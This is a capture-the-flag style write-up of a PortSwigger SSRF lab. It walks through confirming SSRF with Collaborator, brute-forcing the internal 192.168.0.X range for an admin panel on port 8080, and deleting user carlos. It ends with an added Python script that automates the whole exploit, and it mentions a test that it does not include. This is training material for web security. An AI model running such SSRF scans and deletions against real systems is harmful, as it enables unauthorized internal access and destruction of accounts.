Solving Portswigger Academy: Basic SSRF against another back-end system
This lab is similar to the previous one, but here we first have to locate the back-end host on the internal network that serves the admin panel, because its address is not given to us.
This lab has a stock check feature which fetches data from an internal system.
To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.
When you access the lab, you will see a page similar to the one from the previous lab.

Click on View details and then on Check stock. The response only shows a number (the stock count) and nothing else.

Let's first confirm that the application is vulnerable to SSRF using Burp Collaborator. Replace the URL the stock check submits (the stockApi parameter) with the Collaborator URL and send the request.

When I checked Collaborator, I saw the incoming requests, which confirms that the application is vulnerable to SSRF.

Now send the request to Intruder and replace the hostname with 192.168.0.1 and the port with 8080, keeping /admin as the path. Mark the last octet of the IP address as the payload position and brute-force it with the numbers 1 to 255.

After the attack finishes, sort the results by status code and notice that payload 128 returns 200 while the rest return errors. That means the admin interface is at 192.168.0.128.


Now send this request to Repeater and modify it to delete the user carlos. The URL becomes: http://192.168.0.128:8080/admin/delete?username=carlos

If we then request /admin again through the same parameter, we receive the page below.

This indicates that we have successfully deleted the carlos user and solved the lab.
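The same three steps (scan 192.168.0.X:8080 for /admin, send the delete URL, re-fetch /admin to verify) can be scripted instead of clicking through Intruder and Repeater. The script below is an added example written for this write-up, not code from the lab or from the original post. It assumes the lab's stock check is a POST to /product/stock whose stockApi parameter carries the URL the server fetches; LAB_URL is a placeholder you must replace with your own lab hostname, and the fake responses in the test are constructed.

```python
"""Added example: scripted SSRF scan of 192.168.0.0/24 on port 8080, then deleting
a user through the same stockApi parameter.  Not code from the original post.
LAB_URL is a placeholder (assumption) to be replaced with the real lab host."""
import re
import urllib.error
import urllib.parse
import urllib.request

# Assumption: the stock-check endpoint and its stockApi parameter, as used by this lab.
LAB_URL = "https://YOUR-LAB-ID.web-security-academy.net/product/stock"


def stock_body(target_url: str) -> bytes:
    """Form body the stock check expects, pointing stockApi at our chosen internal URL."""
    return urllib.parse.urlencode({"stockApi": target_url}).encode()


def candidate_admin_urls(prefix: str = "192.168.0", port: int = 8080, path: str = "/admin"):
    """The 254 host addresses of the /24 that Intruder brute-forces in the write-up."""
    for last_octet in range(1, 255):
        yield f"http://{prefix}.{last_octet}:{port}{path}"


def http_send(target_url: str, lab_url: str = LAB_URL, timeout: float = 10.0):
    """POST stockApi=<target_url> to the lab and return (status, body)."""
    req = urllib.request.Request(lab_url, data=stock_body(target_url), method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        # The lab relays back-end failures as 4xx/5xx; keep the code so the caller can filter.
        return err.code, err.read().decode(errors="replace")


def scan_for_admin(send=http_send, **kwargs):
    """Return the internal URLs that answered 200, i.e. 'sort Intruder results by status'."""
    return [url for url in candidate_admin_urls(**kwargs) if send(url)[0] == 200]


def host_of(url: str) -> str:
    """Extract the internal IP from a hit, e.g. 192.168.0.128."""
    return urllib.parse.urlsplit(url).hostname


def delete_url(admin_url: str, username: str) -> str:
    """Build e.g. http://192.168.0.128:8080/admin/delete?username=carlos."""
    return admin_url.rstrip("/") + "/delete?" + urllib.parse.urlencode({"username": username})


def user_listed(admin_html: str, username: str) -> bool:
    """True if the admin panel still shows a delete link for the user."""
    return re.search(rf"/admin/delete\?username={re.escape(username)}\b", admin_html) is not None


def solve(send=http_send, username: str = "carlos"):
    """Scan, delete the user, re-fetch /admin and report whether the user is gone."""
    hits = scan_for_admin(send)
    if not hits:
        return None
    admin_url = hits[0]
    send(delete_url(admin_url, username))
    _, html = send(admin_url)
    return admin_url, not user_listed(html, username)


if __name__ == "__main__":
    print(solve())
```

Filtering on status 200 is what the Intruder sort does; if the back-end answered differently (for example a 302 on the delete), `http_send` still returns the code so you can adjust the filter rather than lose the hit.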